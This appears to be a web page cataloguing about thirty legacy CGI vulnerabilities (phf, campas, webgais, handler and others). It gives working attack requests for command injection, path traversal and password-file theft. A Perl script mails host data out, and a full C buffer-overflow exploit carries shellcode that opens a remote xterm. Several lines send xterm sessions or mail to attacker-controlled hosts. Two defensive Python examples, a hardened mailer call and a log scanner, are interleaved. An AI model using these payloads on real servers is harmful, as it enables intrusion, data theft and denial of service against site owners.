SoFunction
Updated on 2025-04-11

CGI Vulnerability Collection


1.phf vulnerability
The phf vulnerability is probably the most classic one; almost every article on the subject covers it. It lets you execute commands on the server, for example to display /etc/passwd:
lynx /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
But can we find it?
2. Vulnerabilities in 2.0beta10 or earlier
Any file readable with the permissions of the user nobody can be read.
lynx /cgi-bin/?/etc/passwd
Version 2.1 can only read shtml files. As for password files, note that the file may instead be at
/etc/
/etc/security/passwd, etc.
3.whois_raw.cgi
lynx /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx /cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%:0
4.faxsurvey
lynx /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
5.
If the server has one, anyone can execute commands with the privileges of the HTTP daemon.
#!/usr/bin/perl
$URL='/a/'; # please _DO_ _modify_ this
$EMAIL='pdoru@,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #If you don't have the wget command, you can use lynx
#system({"lynx"} "lynx", $text);
6. info2www vulnerability in some versions (1.1)
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami asswd|)'
$
You have new mail.
$
To be honest, I don't quite understand. :(
7.
lynx -source \
'/cgi-bin/?/../../../../etc/motd'
There is another vulnerability that allows command execution:
lynx -dump /cgi-bin/?'%0A/bin/uname%20-a|'

or
lynx -dump \
http://victim/cgi-bin/?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
8.wrap
lynx /cgi-bin/wrap?/../../../../../etc
9.www-sql
This lets you read some restricted pages. For example,
enter /protected/ in your browser:
You are asked for an account and password. If the server has www-sql, you don't need them:
/cgi-bin/www-sql/protected/:
10.view-source
lynx /cgi-bin/view-source?../../../../../../../etc/passwd
11.campas
lynx /cgi-bin/campas?%0acat%0a/etc/passwd%0a
12.webgais
telnet 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
query=';mail+drazvan\@
13.websendmail
telnet 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@=a&content=a
14.handler
telnet 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh -display |?data=Download
or
GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download
Note that cat is followed by a TAB character rather than a space. The server will report that useless_shit cannot be opened, but the command that follows is still executed.
15.test-cgi
lynx /cgi-bin/test-cgi?\whatever
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST =
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
This gives you some of the HTTP directories.
lynx /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
This trick doesn't seem to work. :(
lynx /cgi-bin/nph-test-cgi?/*
You can also try these:
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *
16. On some BSD Apache installations, you can:
lynx /root/etc/passwd
lynx /~root/etc/passwd
17.htmlscript
lynx /cgi-bin/htmlscript?../../../../etc/passwd
18.
The demo cgi program calls /bin/mail without filtering user
input, so any program based on could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include HTTPdrocks and SDGROCKS. If
you can retrieve a copy of the compiled program, running strings on it
will probably reveal the password.
Do a web search on to get a copy and study the code yourself if
you have more questions.
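One way to close the hole described in item 18, and in the other shell-injection entries on this page, is to validate the form field strictly and pass it to the mailer as a single argv element with no shell involved. This is an added example, not code from the original page or from any program it names; the function names, the address pattern and the `ARGV_ECHO` stand-in for /bin/mail are assumptions made for the example.

```python
import re
import subprocess
import sys

# Narrow address grammar: must start with an alphanumeric (so it can never be
# read as a "-option") and allows no whitespace, control or shell characters.
ADDRESS_RE = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._+-]{0,63}@[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def vulnerable_command(recipient):
    """Command text as the flawed CGI builds it for sh: the field is pasted in."""
    return "/bin/mail -s 'form reply' " + recipient


def checked_recipient(value):
    """Return value unchanged if it is a plain address, else raise ValueError.

    fullmatch() is deliberate: with match() and '$', a value ending in a
    newline (%0a in the request) would still be accepted.
    """
    if not isinstance(value, str) or ADDRESS_RE.fullmatch(value) is None:
        raise ValueError("recipient rejected: %r" % (value,))
    return value


def send_form_mail(recipient, subject, body, mailer=("/bin/mail",)):
    """Hardened form: argv list, no shell, so no field is parsed as command text."""
    subject = re.sub(r"[\r\n]+", " ", subject)[:200]   # keep it to one line
    argv = [*mailer, "-s", subject, checked_recipient(recipient)]
    return subprocess.run(argv, input=body, text=True, capture_output=True,
                          check=True, timeout=10)


# Stand-in for /bin/mail (assumption, so the example runs anywhere): it prints
# the argument vector it received instead of sending anything.
ARGV_ECHO = (sys.executable, "-c", "import sys; print(sys.argv[1:])")

if __name__ == "__main__":
    # Decoded forms of field values that appear in requests on this page.
    for field in ("alice@example.org", ";mail your_address",
                  "x\n/bin/cat /etc/passwd"):
        print("sh would see:", repr(vulnerable_command(field)))
        try:
            result = send_form_mail(field, "form reply", "hi\n", ARGV_ECHO)
            print("mailer argv:", result.stdout, end="")
        except ValueError as exc:
            print(exc)
```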
19.Frontpage extensions
If you read /_vti_inf.html you get the FP extensions version
and its path on the server. There are also some password files, such as:
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/
20. CGI
I haven't come across this one before, and I feel some of the details shouldn't be gotten wrong, so I have just posted it in English.
John Carlton found following. He developed an exploit for the
free web stats services offered at , and supplied the
webmaster with proper code to patch the bug.
Start an account with , and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO" This will call up a file called with your user #
and password included in it. Save this file to your hard disk and
open it with notepad. The only form of security in this is a
hidden attribute on the form element of your account number.
Change this from
*input type=hidden name=account value=your#*
to
*input type=text name=account value=""*
Save your page and load it into your browser. There will now be a
text input box where the hidden element was before. Simply type a
# in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to
that user profile.
But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple javascript function.
Deep inside the web site authors still have the good old ""
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:
/cgi-bin/?account=&password=
21.Vulnerability in Glimpse HTTP
telnet 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@\MD;echo
HTTP/1.0
22.
This program only works against versions below 24:
/*### ########################################################*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);
/* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";
int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],offset;
unsigned long sp;
char dispname[255];
char *host;
offset = sp = cnt = ver = 0;
fprintf(stderr,"\t%s - Gus\n",argv[0]);
if (argc<3) usage(argv[0]);
while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {
switch(cnt){
case 'h':
host = optarg;
break;
case 'd':
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
}
break;
case 'v':
ver = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
sp = offset + getsp(ver);
(void)doit(host,sp,shellcode);
exit(0);
}
unsigned long getsp(int ver) {
/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;
if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,"I don't have an sp for that version try using the -o option.\n");
fprintf(stderr,"Versions above 24 are patched for this bug.\n");
exit(1);
} else {
return sp;
}
}
int usage (char *name) {
fprintf(stderr,"\tUsage:%s -h host -d -v [-o ]\n",name);
fprintf(stderr,"\. %s -h -d 127.0.0.1:0 -v 22\n",name);
exit(1);
}
int openhost (char *host, int port) {
int sock;
struct hostent *he;
struct sockaddr_in sa;
he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostname\n");
exit(-1);
}
memcpy(&sa.sin_addr, he->h_addr, he->h_length);
sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero));
if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host");
exit(-1);
}
return(sock);
}
void doit (char *host,long sp, char *shellcode) {
int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";
bzero(buf);
for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs,chain);
qs[strlen(chain)]=0x90;
qs[4104]= sp&0x000000ff;
qs[4105]=(sp&0x0000ff00)>>8;
qs[4106]=(sp&0x00ff0000)>>16;
qs[4107]=(sp&0xff000000)>>24;
qs[4108]= sp&0x000000ff;
qs[4109]=(sp&0x0000ff00)>>8;
qs[4110]=(sp&0x00ff0000)>>16;
qs[4111]=(sp&0xff000000)>>24;
qs[4112]= sp&0x000000ff;
qs[4113]=(sp&0x0000ff00)>>8;
qs[4114]=(sp&0x00ff0000)>>16;
qs[4115]=(sp&0xff000000)>>24;
qs[4116]= sp&0x000000ff;
qs[4117]=(sp&0x0000ff00)>>8;
qs[4118]=(sp&0x00ff0000)>>16;
qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;
qs[4121]=(sp&0x0000ff00)>>8;
qs[4122]=(sp&0x00ff0000)>>16;
qs[4123]=(sp&0xff000000)>>24;
qs[4124]= sp&0x000000ff;
qs[4125]=(sp&0x0000ff00)>>8;
qs[4126]=(sp&0x00ff0000)>>16;
qs[4127]=(sp&0xff000000)>>24;
qs[4128]= sp&0x000000ff;
qs[4129]=(sp&0x0000ff00)>>8;
qs[4130]=(sp&0x00ff0000)>>16;
qs[4131]=(sp&0xff000000)>>24;
strcpy((char*)&qs[4132],shellcode);
sock = openhost(host,80);
write(sock,"GET /cgi-bin/?",23);
write(sock,qs,strlen(qs));
write(sock," HTTP/1.0\n",10);
write(sock,"User-Agent: ",12);
write(sock,qs,strlen(qs));
write(sock,"\n\n",2);
sleep(1);
/* printf("GET /cgi-bin/?%s HTTP/1.0\nUser-Agent: %s\n\n",qs,qs); */
/*
setenv("HTTP_USER_AGENT",qs,1);
setenv("QUERY_STRING",qs,1);
system("./");
*/
}
Viewing images:
/cgi-bin/?display=image&image=../../../../../../path_to_gif/
23.
lynx /cgi-bin/finger?@localhost
This returns the usernames logged in on the host.
24.
Robert Moniot found the following. The May 1998 issue of SysAdmin
Magazine contains an article, "Web-Enabled Man Pages", which
includes source code for very nice cgi script named to feed
man pages to a web browser. The hypertext links to other man
pages are an especially attractive feature.
Unfortunately, this script is vulnerable to attack. Essentially,
anyone who can execute the cgi thru their web browser can run any
system commands with the user id of the web server and obtain the
output from them in a web page.
25.
Add to the form:

/etc/passwd will then arrive at your email address.
26.JFS
I believe everyone has read the article "The detailed process of JFS intruding into PCWEEK-LINUX host", in which he uses the photoads CGI module to break into the host. I have never actually tried it, so the following is what I understood from reading the article:
lynx first "/photoads/cgi-bin/?AdNum=31
337&action=done&Country=lala&City=lele&State=a&EMail=lala@&Name=%0a
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111 1111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111 111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111 1111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111 111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111 11111111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111 111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111 11111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111 111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111 111111111111111111111111111&Phone=1
1&Subject=la&password=0&CityStPhone=0&Renewed=0"
Create a new AD value and bypass the check of $AdNum
lynx '/photoads/cgi-bin/?file=
g&AdNum=11111111111111111111111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111 111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111 11111111111111111111111111111111111111111111111111
111111111111111111111111111111111111111111111111111111111111111111111111 111
1111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111 11111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111 1111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111 11111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111 1111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111
111 1111111111111111111111111111111111111111111111&DataFile=1&Password=0&FIL
E_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/\../../../
../../../../home/httpd/html/photoads/cgi-bin/%'
Create/overwrite any file that the user nobody has permission to write.
I don’t know if my understanding is correct. I can’t find the to_url script in its zip package. I wonder which comrade knows?
27.backdoor
I see that some check *s are unlg1.1 and
The previous one was written by UnlG, I have never seen the source code, there is one written by THC, and the packetstorm has its 1.6 source code.
28.
/cgi-bin/?user=guest
This request keeps writing data to the server's hard disk until it is full.
29.campas
> telnet 80
Trying ...
Connected to
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
..... You know what to do next :P
30.webgais
query=';mail+foo@ 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"
line)
query=';mail+drazvan\@
telnet 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@=a
&content=a
31.wrap
/cgi-bin/wrap?/../../../../../etc
Lists the files in the etc directory.
Below are all the CGI program names that may contain vulnerabilities. Other vulnerabilities are still being collected and sorted out.
I sincerely hope to receive your criticism and advice.
/cgi-bin/
/cgi-bin/phf
/cgi-bin/nph-test-cgi
/cgi-bin/nph-publish
/cgi-bin/handler
/cgi-bin/webgais
/cgi-bin/websendmail
/cgi-bin/faxsurvey
/cgi-bin/htmlscript
/cgi-bin/www-sql
/cgi-bin/view-source
/cgi-bin/campas
/cgi-bin/aglimpse
/cgi-bin/glimpse
/scripts/
/_vti_bin/
/_vti_inf.html
/_vti_pvt/
/msadc/Samples/SELECTOR/
/scripts/iisadmin/?http/dir
/adsamples/config/
/%81
/AdvWorks/equipment/catalog_type.asp?
/cgi-bin/?|dir..\..\windows
/::$DATA
/cgi-bin/?user=guest
/?PageServices
/
/cgi-bin/|echo%20>c:\
/cgi-bin/?/../../../../etc/motd
/secure/.wwwacl
/secure/.htaccess
/samples/search/
/scripts/srchadm/
adminlogin?RCpage=/sysadmin/ /c:/program
/test/
/users/scripts/
/ncl_items.html?SUBJECT=2097
/cgi-bin/jj
/cgi-bin/info2www
/cgi-bin/finger
/cgi-bin/AnyForm2
/cgi-bin/wrap
/cgi-bin/cgiwrap
/cgi-win/
/../../
/iisadmpwd/
cfdocs/expeval/?OpenFilePath=C:\WINNT\repair\sam._
/cfdocs/expeval/
/?FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._
/CFIDE/Administrator/
/cgi-dos/
/scripts/issadmin/
/scripts/tools/
/cfdocs/expelval/
/iissamples/exair/howitworks/
/iissamples/sdk/asp/docs/
/msads/Samples/SELECTOR/
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/doc
/.html/............./
/....../
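For defenders, the requests collected on this page translate directly into log indicators. The following is an added example, not part of the original page: it tags common-log-format entries that hit the script names listed above or carry the `%0a`, `../` and shell-metacharacter patterns used throughout. The sample log, the tag names and the 1024-byte threshold are constructed for the example.

```python
import re
from urllib.parse import unquote

# Script names that survive in this page's list; matched against the path
# segment that follows /cgi-bin/.
LEGACY_CGI = frozenset({
    "phf", "whois_raw.cgi", "faxsurvey", "info2www", "wrap", "cgiwrap",
    "www-sql", "view-source", "campas", "webgais", "websendmail", "handler",
    "test-cgi", "nph-test-cgi", "nph-publish", "htmlscript", "aglimpse",
    "glimpse", "finger", "jj", "AnyForm2"})
# Request line and status code of an Apache/NCSA common-log-format entry.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>[^"]*?)(?: HTTP/\d\.\d)?" (?P<status>\d{3})')
MAX_QUERY = 1024   # assumed cut-off for an abnormally long query string

def decode(text, rounds=2):
    """Percent-decode `rounds` times so double-encoded input is caught too."""
    for _ in range(rounds):
        text = unquote(text)
    return text

def classify(line):
    """Return (status, sorted tags) for one log line, or None if it does not parse."""
    m = LOG_RE.search(line)
    if m is None:
        return None
    path, _, query = m.group("target").partition("?")
    decoded, tags = decode(m.group("target")), set()
    segments = decode(path).split("/")
    if "cgi-bin" in segments[:-1]:
        script = segments[segments.index("cgi-bin") + 1]
        if script in LEGACY_CGI:
            tags.add("legacy-cgi:" + script)
    if "\n" in decoded or "\r" in decoded:
        tags.add("newline-injection")   # %0a ends the intended command line
    if "../" in decoded or "..\\" in decoded:
        tags.add("path-traversal")
    if any(ch in decoded for ch in "|;`"):
        tags.add("shell-metachar")      # noisy: ';' also occurs in benign queries
    if len(query) > MAX_QUERY:
        tags.add("oversized-query")     # e.g. the overflow request in item 22
    return int(m.group("status")), sorted(tags)

# Constructed sample log: documentation addresses, requests quoted on this page.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Apr/2025:10:00:00 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 512
192.0.2.11 - - [11/Apr/2025:10:00:02 +0000] "GET /cgi-bin/view-source?../../../../../../../etc/passwd HTTP/1.0" 404 0
192.0.2.12 - - [11/Apr/2025:10:00:05 +0000] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 200 731
192.0.2.13 - - [11/Apr/2025:10:00:09 +0000] "GET /cgi-bin/search?q=cgi+security HTTP/1.0" 200 2048
"""

def scan(lines):
    """Return (line number, status, tags) for every entry that raised a tag."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, *r) for n, r in results if r and r[1]]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG.splitlines()), sep="\n")
```

A 200 status next to a `legacy-cgi` tag means the script exists and answered, which is the case to triage first; a 404 is a probe against a script that is not installed.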